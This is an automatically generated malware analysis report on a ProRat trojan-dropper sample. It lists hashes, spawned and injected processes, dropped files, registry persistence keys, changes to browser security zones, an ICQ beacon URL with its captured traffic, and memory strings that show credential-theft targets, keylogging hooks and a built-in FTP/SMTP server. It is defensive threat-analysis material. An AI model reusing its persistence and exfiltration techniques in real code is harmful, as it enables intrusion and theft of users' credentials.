Generic.Malware.PBVPkTk.94AF13E8_e9b5b33788

by malwarelabrobot on May 24th, 2016 in Malware Descriptions.

Trojan-Dropper.Win32.Takill (Kaspersky), Generic.Malware.P!BVPk!Tk.94AF13E8 (B) (Emsisoft), Generic.Malware.P!BVPk!Tk.94AF13E8 (AdAware), Trojan.Win32.Bumat.FD, VirusParite.YR (Lavasoft MAS)
Behaviour: Trojan-Dropper, Trojan, Virus, Malware


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: e9b5b337881771f2693f8ba96ac57872
SHA1: 4eb848601b8b0ec4a85b7d60f511d5421eb84c82
SHA256: 1bf1c17b9cccb50b6ed68d75d84bda6c35c877ccadfd77bbf31743bfee35224d
SSDeep: 6144:vTkfUxsPZl2ftmF2IuJRty23RDYykVj ZraOrdw gXtMu q/W8C6 J2ws1C5srj:vTkfZl2gBuJRtTjWMHw uI6 kweCEj
Size: 408986 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6, MicrosoftVisualC, MicrosoftVisualCv50v60MFC, MicrosoftVisualC50, Armadillov171
Company: no certificate found
Created at: 2003-07-04 22:53:03
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan-Dropper. Trojan program, intended for stealth installation of other malware into user's system.

Payload

No specific payload has been found.

Process activity

The Generic creates the following process(es):

TASKKILL.exe:716
net1.exe:1140
fservice.exe:1264
win_a32.exe:1452
incom.exe:1076
NET.exe:644
%original file name%.exe:560

The Generic injects its code into the following process(es):

incom_.exe:1824
services.exe:1716
Explorer.EXE:532

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process fservice.exe:1264 makes changes in the file system.
The Generic creates and/or writes to the following file(s):

%WinDir%\services.exe (2105 bytes)
%WinDir%\system\sservice.exe (2105 bytes)

The Generic deletes the following file(s):

%System%\fservice.exe (0 bytes)
%WinDir%\system\sservice.exe (0 bytes)

The process win_a32.exe:1452 makes changes in the file system.
The Generic creates and/or writes to the following file(s):

%System%\incom.exe (45172 bytes)
%System%\incom_.exe (3172 bytes)

The process incom.exe:1076 makes changes in the file system.
The Generic creates and/or writes to the following file(s):

%System%\incom.exe.bat (99 bytes)
%System%\fservice.exe (2105 bytes)
%WinDir%\system\sservice.exe (2105 bytes)

The process %original file name%.exe:560 makes changes in the file system.
The Generic creates and/or writes to the following file(s):

C:\%original file name%.exe.bat (119 bytes)
%System%\win_a32.exe (49908 bytes)

Registry activity

The process TASKKILL.exe:716 makes changes in the system registry.
The Generic creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D9 FC 6E 82 C1 47 55 64 53 D9 9C 85 EB B6 76 0A"

The process net1.exe:1140 makes changes in the system registry.
The Generic creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "36 0C 2D 70 DA F0 D4 34 FD BA 27 CF CC 08 95 97"

The process fservice.exe:1264 makes changes in the system registry.
The Generic creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "85 E4 7F 6C 86 33 F5 31 71 DB E8 D6 97 A7 69 06"

The process win_a32.exe:1452 makes changes in the system registry.
The Generic creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CE DE A2 AA 4F E1 3B 0A FE 55 52 BC 4A FE 49 D5"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%System%]
"incom.exe" = "incom"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%System%]
"incom_.exe" = "incom_"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

The Generic modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Generic modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Generic modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The process incom.exe:1076 makes changes in the system registry.
The Generic creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "83 7B 04 B8 66 6B 3E 03 B8 77 85 20 DA EE 3E E6"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run]
"DirectX For Microsoft® Windows" = "%System%\fservice.exe"

[HKCU\Software\Microsoft\Windows NT Script Host\Microsoft DxDiag\WinSettings]
"ICQ_UIN" = ""
"LanNotifie" = ""

[HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\{5Y99AE78-58TT-11dW-BE53-Y67078979Y}]
"StubPath" = "%WinDir%\system\sservice.exe"

[HKCU\Software\Microsoft\Windows NT Script Host\Microsoft DxDiag\WinSettings]
"Bulas" = "1"
"Kurban_Ismi" = "dobshxquns"
"XP_FW_Disable" = "1"
"XP_SYS_Recovery" = "0"
"Hata" = ""
"Port" = "4001"
"Sifre" = "u`obdmm"
"Mail" = "qsns`u^u`obdmmAx`inn/bnl"
"ICQ_UIN2" = "204793709"
"FW_KILL" = "1"

"Online_List" = ""
"KSil" = "1"

The Generic adds the reference to itself to be executed when a user logs on:

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Shell" = "Explorer.exe %System%\fservice.exe"

The process incom_.exe:1824 makes changes in the system registry.
The Generic creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "04 57 38 55 11 33 B5 34 77 BA 9B A1 36 AE 06 4E"

The process NET.exe:644 makes changes in the system registry.
The Generic creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0D C3 B0 D2 BC 13 6D 48 1E 3E 7C 40 CB ED 4E 50"

The process %original file name%.exe:560 makes changes in the system registry.
The Generic creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3D 44 41 23 4F 7C 0E 96 3B F2 B5 D7 24 7E EA 35"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%System%]
"win_a32.exe" = "win_a32"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

The Generic modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Generic modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Generic modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Dropped PE files

MD5 File path
9269b887ff11430c8c0688d02a867a30 c:\WINDOWS\services.exe
9269b887ff11430c8c0688d02a867a30 c:\WINDOWS\system32\fservice.exe
bed59d97f053345adc084464d3863cfd c:\WINDOWS\system32\incom_.exe
efe1a51eac2e377a23fc11edf9be91d6 c:\WINDOWS\system32\reginv.dll
5cfd14e8ea89e0e97ff051182a45b693 c:\WINDOWS\system32\win_a32.exe
36234e0b8df76ea2c282bba1a1b45748 c:\WINDOWS\system32\winkey.dll
9269b887ff11430c8c0688d02a867a30 c:\WINDOWS\system\sservice.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 2640 4096 3.25072 4eeab52a8319fc556af079d37a960128
.rdata 8192 998 4096 0.872724 f39fd91163c00d68b773378539f8adf9
.data 12288 7032 8192 3.01989 23f6a7745258bcce720cc5b8b8a4706f
.rsrc 20480 2408 4096 1.24003 a4c65c610dd1f8cb71fb24913062ca5d

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://www.ovip.icq.com/wwp/msg/1,,,00.html?Uin=315682618&Name=ProRat&Send=yes
hxxp://web.icq.com/wwp/msg/1,,,00.html?Uin=315682618&Name=ProRat&Send=yes 178.237.20.20
mta6.am0.yahoodns.net 98.136.216.25


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

GET /wwp/msg/1,,,00.html?Uin=315682618&Name=ProRat&Send=yes HTTP/1.1
Host: web.icq.com


HTTP/1.1 301 Moved Permanently
Server: nginx/1.8.0
Date: Mon, 23 May 2016 09:06:16 GMT
Content-Type: text/html
Content-Length: 184
Connection: keep-alive
Keep-Alive: timeout=75
Location: hXXps://web.icq.com/wwp/msg/1,,,00.html?Uin=315682618&Name=ProRat&Send=yes
X-Frame-Options: SAMEORIGIN
Cache-Control: max-age=10800
<html>..<head><title>301 Moved Permanently</title
></head>..<body bgcolor="white">..<center><h1&
gt;301 Moved Permanently</h1></center>..<hr><cent
er>nginx/1.8.0</center>..</body>..</html>..HTTP/1
.1 301 Moved Permanently..Server: nginx/1.8.0..Date: Mon, 23 May 2016 
09:06:16 GMT..Content-Type: text/html..Content-Length: 184..Connection
: keep-alive..Keep-Alive: timeout=75..Location: hXXps://web.icq.com/ww
p/msg/1,,,00.html?Uin=315682618&Name=ProRat&Send=yes..X-Frame-Options:
 SAMEORIGIN..Cache-Control: max-age=10800..<html>..<head>&
lt;title>301 Moved Permanently</title></head>..<body
 bgcolor="white">..<center><h1>301 Moved Permanently<
;/h1></center>..<hr><center>nginx/1.8.0</cente
r>..</body>..</html>....

The Generic connects to the servers at the folowing location(s):

incom_.exe_1824:

.text
`.data
.rsrc
MSVBVM60.DLL
soflpURl
MSWinsockLib.Winsock
MSWINSCK.OCX
%Program Files%\Microsoft Visual Studio\VB98\VB6.OLB
%WinDir%\SYSTEM\MSWINSCK.oca
VBA6.DLL
Cos I was bored I checked this VB program and it finished within minutes. You can mail me on [email protected] for any additional information on these things.
2c49f800-c2dd-11cf-9ad6-0080c7e7b78d
@*\AC:\My Projects\PROJECTS\IpChecker\IpChecker.vbp
IpChecker.exe

incom_.exe_1824_rwx_10001000_00001000:

RegEnumKeyW
Advapi32.dll
kernel32.dll
NTDLL.DLL
Windows services
{5Y99AE78-58TT-11dW-BE53-Y67078979Y}
user32.dll

incom_.exe_1824_rwx_10004000_00002000:

%System%\incom_.exe
KERNEL32.dll
SetWindowsHookExA
UnhookWindowsHookEx
USER32.dll
GetCPInfo
TESTDLL.dll

services.exe_1716:

.rsrc
Port
LocalPort
PeerPort
SocksPort
SocksPassword
wsock32.dll
Unable to load wsock32.dll Error #
%s: WSAStartup error #%d
0.0.0.0
Cannot change Port if not closed
Cannot change LocalPort if not closed
255.255.255.255
WSocketResolveHost: Cannot convert host address '%s', Error #%d
WSocketResolvePort: Invalid Port.
WSocketResolvePort: Cannot convert port '%s', Error #%d
WSocketResolveProto: Cannot convert protocol '%s', Error #%d
GetPeerPort
%s: can't start DNS lookup, error #%d
winsock.bind failed, error #%d
winsock.getsockname failed, error #%d
Connect: No Port Specified
listen: port not assigned
Winsock.GetHostName failed
Operation would block
Operation now in progress
Operation already in progress
Socket operation on non-socket
Protocol not supported
Socket type not supported
Operation not supported on socket
Protocol family not supported
Address family not supported by protocol family
WinSock DLL cannot support this application
Can't change socks port if not closed
Listening is not supported thru socks server
tcp is the only protocol supported thru socks server
0.0.0.1
command not supported
address type not supported
TFtpString
TFtpServer (c) 1998-2000 F. Piette V1.08
FtpServerException
FtpSrv
TFtpSrvAuthenticateEvent
TFtpCtrlSocket
Password
TFtpSrvChangeDirectoryEvent
TFtpSrvBuildDirectoryEvent
TFtpSrvClientConnectEvent
TFtpSrvDataSessionConnectedEvent
TFtpSrvClientCommandEvent
Keyword
TFtpSrvAnswerToClientEvent
TFtpSrvValidateXferEvent
TFtpSrvDataAvailableEvent
TFtpSrvRetrDataSentEvent
TFtpSrvCommandProc
TFtpSrvCommandTableItem
TFtpServer
TFtpServer4
220 ICS FTP Server ready.
PORT
500 '%s': command not understood.
331 Password required for %s.
503 Login with USER first.
230 User %s logged in.
530 Login incorrect.
$530 Please login with USER and PASS.
250 CWD command successful. "%s" is current directory.
501 CWD failed. %s
257 "%s" is current directory.
200 Port command successful.
501 Invalid PORT command.
150 Opening data connection for %s.
501 Cannot STOR. %s
ftp-data
426 Connection closed; %s.
426 Connection closed; transfer aborted. Error #%d
501 Cannot RETR. %s
451 Failed: %s.
1 ftp ftp
%s %2.2d
200 Type set to %s.
500 'TYPE %s': command not understood.
250 File '%s' deleted.
450 File '%s' can't be deleted.
550 '%s': no such file or directory.
213 %d
550 Command failed: %s.
350 REST supported. Ready to resume at byte offset %d.
501 Syntax error in parameter: %s.
553 '%s': file already exists.
250 File '%s' renamed to '%s'.
450 File '%s' can't be renamed.
200 Ok. Parameter was '%s'.
550 '%s': can't create directory.
550 '%s': file or directory already exists.
257 '%s': directory created.
150 APPE supported. Ready to append file "%s" at offset %d.
200 Ok. STRU parameter '%s' ignored.
550 '%s': no such directory.
250 '%s': directory removed.
550 '%s': can't remove directory.
227 Entering Passive Mode (127,0,0,1,%d,%d).
227 Entering Passive Mode (%d,%d,%d,%d,%d,%d).
500 PASV exception: '%s'.
213 %s
550 %s
SMTP component (c) 1997-2000 F. Piette V2.17
SmtpException
SmtpProt
TSmtpState
smtpReady
smtpDnsLookup
smtpConnecting
smtpConnected
smtpInternalReady
smtpWaitingBanner
smtpWaitingResponse
smtpAbortP
TSmtpRequest
smtpConnect
smtpHelo
smtpMailFrom
smtpVrfy
smtpRcptTo
smtpData
smtpQuit
smtpRset
smtpOpen
smtpMail
smtpCustom
TSmtpFct
smtpFctNone
smtpFctHelo
smtpFctConnect
smtpFctMailFrom
smtpFctRcptTo
smtpFctData
smtpFctVrfy
smtpFctQuit
smtpFctRsetp
TSmtpFctSet
TSmtpContentType
smtpHTML
smtpPlainText
TSmtpDisplay
TSmtpHeaderLineEvent
TSmtpProcessHeaderEvent
TSmtpGetDataEvent
MsgLine
TSmtpRequestDone
TSmtpAttachmentContentType
TSmtpAttachHeader
TSmtpNextProc
TCustomSmtpClient
TCustomSmtpClientd
TSmtpCli
OnProcessHeader
TSyncSmtpCli
smtp
SMTP component not ready
UhG%D
SMTP component not connected
SMTP component already connected
426 Operation aborted.
.hPPD
FtpSrvT (c) 1999-2000 F. Piette V1.02
TFtpCtrlSocket (c) 1998-2000 F. Piette V1.06
EFtpCtrlSocketException
FtpSrvC
TFtpCtrlState
ftpcInvalid
ftpcWaitingUserCode
ftpcWaitingPassword
ftpcReady
ftpcWaitingAnswer
TFtpCmdType
ftpcPORT
ftpcSTOR
ftpcRETR
ftpcCWD
ftpcXPWD
ftpcPWD
ftpcUSER
ftpcPASS
ftpcLIST
ftpcRMD
ftpcTYPE
ftpcSYST
ftpcQUIT
ftpcDELE
ftpcRNFR
ftpcMKD
ftpcRNTO
ftpcNOOP
ftpcNLST
ftpcABOR
ftpcCDUP
ftpcSIZE
ftpcREST
ftpcAPPE
ftpcSTRU
ftpcMDTM
TFtpOption
ftpcUNC
TFtpOptions
CmdBuf
CmdLen
FtpState
PassWord
220-ICS FTP Server ready
ssHorizontal
OnKeyDown
OnKeyPress|
OnKeyUp
windows
AutoHotkeys
AutoHotkeysT2E
:].tJ
EInvalidGraphicOperation
KeyPreview
WindowState
ssHotTrack
TWindowState
poProportional
TWMKey
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
vcltest3.dll
TDragOperation
TKeyEvent
TKeyPressEvent
crSQLWait
%s (%s)
IMM32.DLL
EInvalidOperation
%s[%d]
%s_%d
USER32.DLL
comctl32.dll
MSWHEEL_ROLLMSG
MSH_WHEELSUPPORT_MSG
MSH_SCROLL_LINES_MSG
kernel32.dll
Portions Copyright (c) 1983,99 Borland
%u8F3
iphlpapi.dll
user32.dll
The procedure entry point %s could not be located in the dynamic link library %s
The ordinal %u could not be located in the dynamic link library %s
advapi32.dll
shell32.dll
.text
.rdata
.data
.reloc
.aspack
.adata
MFC42.DLL
MSVCRT.dll
GetWindowsDirectoryA
KERNEL32.dll
GetKeyboardState
SetWindowsHookExA
UnhookWindowsHookEx
USER32.dll
dW%xSJ"
mfc42.dll
msvcrt.dll
.HookSec
B[ProRat v1.9 Trojan Horse - Coded by PRO Group - Made in Turkey]
RegEnumKeyW
Advapi32.dll
NTDLL.DLL
Windows services
{5Y99AE78-58TT-11dW-BE53-Y67078979Y}
GetCPInfo
TESTDLL.dll
9'94999?9
CRTZFUKL,GZG
LTCPAJ34,GZG
151.164.23.201
151.164.1.8
212.101.97.7
ege.edu.tr
ankara.edu.tr
192.168.0.1
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_CURRENT_CONFIG
cuteftp
Login :
Password :
Pass :
SOFTWARE\Microsoft\Windows\CurrentVersion
%Program Files%
\GlobalSCAPE\CuteFTP\sm.dat
\GlobalSCAPE\CuteFTP\smdata.dat
\CuteFTP\tree.dat
\CuteFTP\smdata.dat
\GlobalSCAPE\CuteFTP Pro\sm.dat
\GlobalSCAPE\CuteFTP\5.0\sm.dat
\GlobalSCAPE\CuteFTP Pro\2.0\sm.dat
\GlobalSCAPE\CuteFTP Pro\3.0\sm.dat
\GlobalSCAPE\CuteFTP Pro\6.0\sm.dat
\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings
\RSACi.rat
\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings\.Default
\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings\.Default\hXXp://VVV.rsac.org/ratingsv01.html
\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings\PICSRules
\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings\PICSRules\.Default
\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings\PICSRules\.Default\0
\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings\PICSRules\.Default\0\PRPolicy
\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings\PICSRules\.Default\0\PRPolicy\
PRNumURLExpressions
PRBUPort
PRBUUrl
Sites.dat
Password :
Port :
Tport_atm=0
\reg_ent.reg
regedit.exe /s
\winrar.exe
Microsoft Windows NT
Microsoft Windows 2000
Microsoft Windows XP
Microsoft Windows 95
Microsoft Windows 98
Microsoft Windows Me
\Software\Microsoft\Windows NT Script Host\Microsoft DxDiag\WinSettings\
d_.exe
winoa386.mod
\scrpt.bat
\scrpt.vbs
\winkey.dll
\reginv.dll
127.0.0.1
.jpeg
\win.ini
\system.ini
Explorer.exe
del %c%s%c
if exist %c%s%c goto 1
del À
\system32\fservice.exe
\system\sservice.exe
\mps.atm
\kdd32.atm
\system32\winkey.dll
\system\winkey.dll
\system32\wininv.dll
\system\wininv.dll
SOFTWARE\Microsoft\Active Setup\Installed Components\{5Y99AE78-58TT-11dW-BE53-Y67078979Y}
SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run\
Windows
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\
Explorer.exe
SOFTWARE\Microsoft\Windows NT Script Host\Microsoft DxDiag
GET /wwp/msg/1,,,00.html?Uin=
&Name=ProRat&Send=yes HTTP/1.1
Host: web.icq.com
Software\Microsoft\Windows\CurrentVersion\Policies\System
c:\autoexec.bat
\p_ekran.jpg
services.exe
msn.ini
yahoo.ini
Windows Ver :
Windows Language :
Windows Path :
software\microsoft\windows\currentversion
web.icq.com
Port :
Password :
Microsoft Outlook Express 6.00.2800.1158
\p_ekran.bmp
SOFTWARE\Microsoft\Windows NT Script Host\Microsoft DxDiag\WinSettings
Tport
Pplugin1.dll
Pplugin2.dll
Pplugin3.dll
Pplugin4.exe
Pplugin4.dat
Pplugin4.exe /stext
ktd32.atm
Pplugin8.exe
PpluginCd.dll
Pplugin9.dat
Pplugin8.exe /stext
Pplugin10xa.exe
Pplugin10xa.exe /stext
winp9.exe
winp9.exe /stext
eimsn.exe
winrar.exe
Software\Microsoft\Active Setup\Installed Components\{5Y99AE78-58TT-11dW-BE53-Y67078979Y}
\services.exe
Windows services
Windows Logon Service
Port_atm=4001
SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run
SOFTWARE\Microsoft\Active Setup\Installed Components\{5Y99AE78-58TT-11dW-BE53-Y67078979Y}\
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
shutdown.exe -s -t 00
shutdown.exe -r -t 00
shutdown.exe -l
\refresh.scf
CONTROL.EXE desk.cpl
CONTROL.EXE hdwwiz.cpl
CONTROL.EXE inetcpl.cpl
CONTROL.EXE appwiz.cpl
CONTROL.EXE intl.cpl
CONTROL.EXE joy.cpl
CONTROL.EXE access.cpl
CONTROL.EXE main.cpl
CONTROL.EXE ncpa.cpl
CONTROL.EXE nusrmgr.cpl
CONTROL.EXE timedate.cpl
CONTROL.EXE mmsys.cpl
CONTROL.EXE powercfg.cpl
CONTROL.EXE sysdm.cpl
CONTROL.EXE telephon.cpl
CONTROL.EXE odbccp32.cpl
\SOFTWARE\Microsoft\Internet Explorer\TypedURLs
////////// URL HISTORY //////////
url10
url11
url12
url13
url14
url15
url16
url17
url18
url19
url20
url21
url22
url23
url24
url25
00010pPassword Decrypt Error!
SMTP
\ICQ\Icq.exe
\Messenger\msmsgs.exe
\MSN Messenger\msnmsgr.exe
\Yahoo!\Messenger\YPager.exe
\Outlook Express\msimn.exe
\GlobalSCAPE\CuteFTP\cutftp32.exe
\NetMeeting\conf.exe
notepad.exe
mspaint.exe
wordpad.exe
calc.exe
\WinZip\WINZIP32.EXE
\WinRAR\WinRAR.exe
cmd.exe
command.com
\Internet Explorer\IEXPLORE.EXE
wmplayer.exe
\Winamp\winamp.exe
\Real\RealOne Player\realplay.exe
\QuickTime\QuickTimePlayer.exe
\Movie Maker\moviemk.exe
\FlashGet\flashget.exe
_ReadCdKeys
&serverportu=
HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
[email protected]
<[email protected]>
FtpServer1
FtpServer2
SmtpCli1
FtpServer1Authenticate
FtpServer2Authenticate
FormKeyDown
SmtpCli1RequestDone
FtpServer1ChangeDirectory
Memo2KeyDown
xxtype.cpp
derv->tpClass.tpcFlags & CF_HAS_BASES
Inappropriate I/O control operation
Broken pipe
Operation not permitted
%H:%M:%S
%m/%d/%y
%A, %B %d, %Y
d/d/d d:d:d.d
xx.cpp
varType->tpClass.tpcFlags & CF_HAS_DTOR
varType->tpClass.tpcDtorAddr
(errPtr->ERRcInitDtc >= varType->tpClass.tpcDtorCount) || flags
memType->tpClass.tpcFlags & CF_HAS_DTOR
varType->tpArr.tpaElemType->tpClass.tpcFlags & CF_HAS_DTOR
dttPtr->dttType->tpPtr.tppBaseType->tpClass.tpcFlags & CF_HAS_DTOR
IS_CLASS(dttPtr->dttType->tpMask) && (dttPtr->dttType->tpClass.tpcFlags & CF_HAS_DTOR)
elemType->tpClass.tpcFlags & CF_HAS_DTOR
%WinDir%\
Project1.exe
@$xp$16Ftpsrv@FtpSrv__3
@$xp$17Ftpsrv@TFtpServer
@$xp$17Ftpsrv@TFtpString
@$xp$17Smtpprot@TSmtpCli
@$xp$17Smtpprot@TSmtpFct
@$xp$18Ftpsrvc@TFtpOption
@$xp$19Ftpsrvc@TFtpCmdType
@$xp$19Ftpsrvc@TFtpOptions
@$xp$19Smtpprot@TSmtpState
@$xp$20Smtpprot@TSmtpFctSet
@$xp$21Ftpsrvc@TCommandEvent
@$xp$21Ftpsrvc@TDisplayEvent
@$xp$21Ftpsrvc@TFtpCtrlState
@$xp$21Smtpprot@TSmtpDisplay
@$xp$21Smtpprot@TSmtpRequest
@$xp$21Smtpprot@TSyncSmtpCli
@$xp$22Ftpsrvc@TFtpCtrlSocket
@$xp$22Smtpprot@SmtpException
@$xp$22Smtpprot@TSmtpNextProc
@$xp$25Ftpsrv@FtpServerException
@$xp$25Ftpsrv@TFtpSrvCommandProc
@$xp$25Smtpprot@TSmtpContentType
@$xp$25Smtpprot@TSmtpRequestDone
@$xp$26Ftpsrv@TFtpCtrlSocketClass
@$xp$26Smtpprot@TCustomSmtpClient
@$xp$26Smtpprot@TSmtpAttachHeader
@$xp$26Smtpprot@TSmtpGetDataEvent
@$xp$29Smtpprot@TSmtpHeaderLineEvent
@$xp$30Ftpsrv@TFtpSrvCommandTableItem
@$xp$31Ftpsrv@TFtpSrvAuthenticateEvent
@$xp$31Ftpsrv@TFtpSrvRetrDataSentEvent
@$xp$31Ftpsrv@TFtpSrvValidateXferEvent
@$xp$31Ftpsrvc@EFtpCtrlSocketException
@$xp$32Ftpsrv@TFtpSrvClientCommandEvent
@$xp$32Ftpsrv@TFtpSrvClientConnectEvent
@$xp$32Ftpsrv@TFtpSrvDataAvailableEvent
@$xp$32Smtpprot@TSmtpProcessHeaderEvent
@$xp$33Ftpsrv@TFtpSrvAnswerToClientEvent
@$xp$33Ftpsrv@TFtpSrvBuildDirectoryEvent
@$xp$34Ftpsrv@TFtpSrvChangeDirectoryEvent
@$xp$35Smtpprot@TSmtpAttachmentContentType
@$xp$39Ftpsrv@TFtpSrvDataSessionConnectedEvent
@Ftpsrv@CopyRight
@Ftpsrv@Finalization$qqrv
@Ftpsrv@FtpServerException@
@Ftpsrv@Register$qqrv
@Ftpsrv@TFtpServer@
@Ftpsrv@TFtpServer@$bctr$qqrp18Classes@TComponent
@Ftpsrv@TFtpServer@$bdtr$qqrv
@Ftpsrv@TFtpServer@AddCommand$qqrx17System@AnsiStringxynpqqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2$v
@Ftpsrv@TFtpServer@BuildDirectory$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%p15Classes@TStreamo
@Ftpsrv@TFtpServer@ClientCommand$qqrp14System@TObjectpci
@Ftpsrv@TFtpServer@ClientDataSent$qqrp14System@TObjectus
@Ftpsrv@TFtpServer@ClientPassiveSessionAvailable$qqrp14System@TObjectus
@Ftpsrv@TFtpServer@ClientRetrDataSent$qqrp14System@TObjectus
@Ftpsrv@TFtpServer@ClientRetrSessionClosed$qqrp14System@TObjectus
@Ftpsrv@TFtpServer@ClientRetrSessionConnected$qqrp14System@TObjectus
@Ftpsrv@TFtpServer@ClientSessionClosed$qqrp14System@TObjectus
@Ftpsrv@TFtpServer@ClientStorDataAvailable$qqrp14System@TObjectus
@Ftpsrv@TFtpServer@ClientStorSessionClosed$qqrp14System@TObjectus
@Ftpsrv@TFtpServer@ClientStorSessionConnected$qqrp14System@TObjectus
@Ftpsrv@TFtpServer@CommandABOR$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
